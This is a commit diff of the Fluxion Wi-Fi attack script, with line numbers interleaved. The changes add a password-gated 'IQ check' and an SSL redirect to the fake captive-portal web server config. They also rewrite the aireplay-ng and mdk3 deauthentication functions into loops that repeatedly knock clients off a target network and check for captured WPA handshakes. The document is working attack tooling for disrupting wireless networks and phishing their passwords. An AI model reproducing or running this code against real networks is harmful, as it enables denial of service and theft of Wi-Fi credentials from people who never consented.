@@ -23,7 +23,7 @@ WORK_DIR=`pwd`
23
23
ipNmap=` ifconfig | sed -En ' s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p' `
24
24
# Deauth duration during handshake capture
25
25
# oo
26
- DEAUTHTIME=" 9999999999999 "
26
+ DEAUTHTIME=" 15 "
27
27
revision=54
28
28
version=0.23
29
29
IP=192.168.1.1
@@ -1053,17 +1053,7 @@ function chinese {
1053
1053
}
1054
1054
# Choose Interface
1055
1055
function setinterface {
1056
- Sites=" ~/fluxion/stable/Sites"
1057
- airmonfile=" ~/fluxion/stable/airmon"
1058
- if [ ! -d " $Sites " ]; then
1059
- cp -r ~ /fluxion/Sites ~ /fluxion/stable/ & > $flux_output_device
1060
- fi
1061
-
1062
- if [ ! -f " $airmonfile " ]; then
1063
- cp -r ~ /fluxion/airmon ~ /fluxion/stable/ & > $flux_output_device
1064
- fi
1065
-
1066
- conditional_clear
1056
+ conditional_clear
1067
1057
top
1068
1058
# unblock interfaces
1069
1059
rfkill unblock all
@@ -1142,10 +1132,34 @@ function deltax {
1142
1132
1143
1133
rm -rf $DUMP_PATH /*
1144
1134
1145
- choosescan
1135
+ iq
1146
1136
selection
1147
1137
}
1148
1138
1139
+ # iq check
1140
+ function iq {
1141
+
1142
+ conditional_clear
1143
+
1144
+ while true ; do
1145
+ conditional_clear
1146
+ top
1147
+ echo " "
1148
+ echo -e " ${red} IQ ChecK ${transparent} "
1149
+ echo
1150
+ echo " Type the password to continue"
1151
+ echo " Please respect your law in your country"
1152
+ echo -e " Password: $red lkswop $transparent "
1153
+ echo " "
1154
+ echo -n " #> "
1155
+ read yn
1156
+ echo " "
1157
+ case $yn in
1158
+ lkswop ) choosescan ; break ;;
1159
+ * ) echo " IQ test failed, exit..." ; sleep 2; exitmode ;;
1160
+ esac
1161
+ done
1162
+ }
1149
1163
# Select channel
1150
1164
function choosescan {
1151
1165
@@ -1412,7 +1426,7 @@ function askauth {
1412
1426
echo " "
1413
1427
case $yn in
1414
1428
1 ) authmode=" handshake" ; handshakelocation; break ;;
1415
- 2 ) authmode=" wpa_supplicant" ; webinterface ; break ;;
1429
+ 2 ) authmode=" wpa_supplicant" ; certssl ; break ;;
1416
1430
3 ) askAP; break ;;
1417
1431
* ) echo " $general_case_error " ; conditional_clear ;;
1418
1432
esac
@@ -3223,7 +3237,7 @@ function handshakelocation {
3223
3237
if [[ " $Host_MAC_loc " == * " $Host_MAC " * ]] && [[ " $Host_SSID_loc " == * " $Host_SSID " * ]]; then
3224
3238
if pyrit -r $handshakeloc analyze 2>&1 | sed -n /$( echo $Host_MAC | tr ' [:upper:]' ' [:lower:]' ) /,/^# /p | grep -vi "AccessPoint" | grep -qi "good,"; then
3225
3239
cp " $handshakeloc " $DUMP_PATH /$Host_MAC -01.cap
3226
- webinterface
3240
+ certssl
3227
3241
else
3228
3242
echo " Corrupted handshake"
3229
3243
echo
@@ -3239,7 +3253,7 @@ function handshakelocation {
3239
3253
else
3240
3254
if aircrack-ng $handshakeloc | grep -q " 1 handshake" ; then
3241
3255
cp " $handshakeloc " $DUMP_PATH /$Host_MAC -01.cap
3242
- webinterface
3256
+ certssl
3243
3257
else
3244
3258
echo " Corrupted handshake"
3245
3259
sleep 4
@@ -3385,33 +3399,21 @@ function deauth {
3385
3399
3386
3400
function deauthMENU {
3387
3401
3388
- while true ; do
3402
+
3389
3403
conditional_clear
3390
3404
3391
3405
clear
3392
3406
top
3393
3407
3394
- echo " $header_deauthMENU "
3408
+ echo " $header_deauthMENU / automatic Handshake check "
3395
3409
echo
3396
3410
echo -e " Status handshake: $Handshake_statuscheck "
3397
3411
echo
3398
- echo -e " " $blue " 1)" $transparent " $deauthMENU_option_1 "
3399
- echo -e " " $blue " 2)" $transparent " $general_back (Select another deauth method)"
3400
- echo -e " " $blue " 3)" $transparent " Select another network"
3401
- echo -e " " $blue " 4)" $transparent " Exit"
3402
- echo -n ' #> '
3403
- read yn
3404
-
3405
- case $yn in
3406
- 1 ) checkhandshake;;
3407
- 2 ) conditional_clear; askclientsel; break ;;
3408
- 3 ) killall airodump-ng mdk3 aireplay-ng xterm & > $flux_output_device ; CSVDB=dump-01.csv; breakmode=1; selection; break ;;
3409
- 4 ) exitmode; break ;;
3410
- * ) echo "
3411
- $general_case_error " ; conditional_clear ;;
3412
- esac
3412
+ echo -e " " $grey " 1)" $transparent " $deauthMENU_option_1 "
3413
+ echo -e " " $grey " 2)" $transparent " $general_back (Select another deauth method)"
3414
+ echo -e " " $grey " 3)" $transparent " Select another network"
3415
+ echo -e " " $grey " 4)" $transparent " Exit"
3413
3416
3414
- done
3415
3417
}
3416
3418
3417
3419
# Capture all
@@ -3432,8 +3434,9 @@ function checkhandshake {
3432
3434
if aircrack-ng $DUMP_PATH /$Host_MAC -01.cap | grep -q " 1 handshake" ; then
3433
3435
killall airodump-ng mdk3 aireplay-ng & > $flux_output_device
3434
3436
wpaclean $HANDSHAKE_PATH /$Host_SSID -$Host_MAC .cap $DUMP_PATH /$Host_MAC -01.cap & > $flux_output_device
3435
- webinterface
3437
+ certssl
3436
3438
i=2
3439
+ y=2
3437
3440
break
3438
3441
3439
3442
else
@@ -3446,8 +3449,9 @@ function checkhandshake {
3446
3449
if pyrit -r $DUMP_PATH /test.cap analyze 2>&1 | grep -q " good," ; then
3447
3450
killall airodump-ng mdk3 aireplay-ng & > $flux_output_device
3448
3451
pyrit -r $DUMP_PATH /test.cap -o $HANDSHAKE_PATH /$Host_SSID -$Host_MAC .cap strip & > $flux_output_device
3449
- webinterface
3452
+ certssl
3450
3453
i=2
3454
+ y=2
3451
3455
break
3452
3456
3453
3457
else
@@ -3584,7 +3588,7 @@ function webinterface {
3584
3588
echo -e " $blue " " 11)" $transparent " Vodafone [ESP]"
3585
3589
echo -e " $blue " " 12)" $transparent " Italian [IT]"
3586
3590
echo -e " $blue " " 13)" $transparent " French [FR]"
3587
- echo -e " $blue " " 13 )" $transparent " Portuguese [POR]"
3591
+ echo -e " $blue " " 14 )" $transparent " Portuguese [POR]"
3588
3592
echo -e " $blue " " 15)" $transparent " German [GER]"
3589
3593
echo -e " $blue " " 16)" $transparent " Chinese [ZH_CN](NEUTRA)"
3590
3594
echo -e " $blue " " 17)" $transparent " \e[1;31m $general_back " $transparent " "
@@ -3854,22 +3858,26 @@ mimetype.assign = (
3854
3858
\" .css\" => \" text/css\"
3855
3859
)
3856
3860
3861
+
3857
3862
server.error-handler-404 = \" /\"
3858
3863
3859
3864
static-file.exclude-extensions = ( \" .fcgi\" , \" .php\" , \" .rb\" , \" ~\" , \" .inc\" )
3860
3865
index-file.names = ( \" index.htm\" )
3861
3866
3867
+ \$ SERVER[\" socket\" ] == \" :443\" {
3868
+ url.redirect = ( \" ^/(.*)\" => \" 192.168.1.1\" )
3869
+ ssl.engine = \" enable\"
3870
+ ssl.pemfile = \" /root/server.pem\"
3862
3871
3872
+ }
3863
3873
3864
3874
#Redirect www.domain.com to domain.com
3865
3875
\$ HTTP[\" host\" ] =~ \" ^www\.(.*)$\" {
3866
3876
url.redirect = ( \" ^/(.*)\" => \" http://%1/\$ 1\" )
3867
-
3868
-
3877
+ ssl.engine = \" enable \"
3878
+ ssl.pemfile = \" /root/server.pem \"
3869
3879
}
3870
-
3871
3880
" > $DUMP_PATH /lighttpd.conf
3872
-
3873
3881
# that redirects all DNS requests to the gateway
3874
3882
echo " import socket
3875
3883
@@ -4195,25 +4203,38 @@ function handshakecheck {
4195
4203
4196
4204
4197
4205
# ############################################# < STUFF > ############################################
4198
-
4206
+ y=1
4199
4207
# Deauth all
4200
4208
function deauthall {
4201
-
4209
+ while true ; do
4210
+ deauthMENU
4202
4211
xterm $HOLD $BOTTOMRIGHT -bg " #000000" -fg " #FF0009" -title " Deauthenticating all clients on $Host_SSID " -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
4212
+ sleep 15
4213
+ checkhandshake
4214
+ done
4203
4215
}
4204
4216
4205
- function deauthmdk3 {
4206
4217
4207
- echo " $Host_MAC " > $DUMP_PATH /mdk3.txt
4218
+ function deauthmdk3 {
4219
+ while true ; do
4220
+ deauthMENU
4221
+ echo " $Host_MAC " > $DUMP_PATH /mdk3.txt
4208
4222
xterm $HOLD $BOTTOMRIGHT -bg " #000000" -fg " #FF0009" -title " Deauthenticating via mdk3 all clients on $Host_SSID " -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH /mdk3.txt -c $Host_CHAN &
4209
4223
mdk3PID=$!
4224
+ sleep 15
4225
+ checkhandshake
4226
+ done
4210
4227
}
4211
4228
4212
4229
# Deauth to a specific target
4213
4230
function deauthesp {
4214
-
4231
+ while true ; do
4232
+ deauthMENU
4215
4233
sleep 2
4216
4234
xterm $HOLD $BOTTOMRIGHT -bg " #000000" -fg " #FF0009" -title " Deauthenticating client $Client_MAC " -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR &
4235
+ sleep 15
4236
+ checkhandshake
4237
+ done
4217
4238
}
4218
4239
4219
4240
# Close all processes
0 commit comments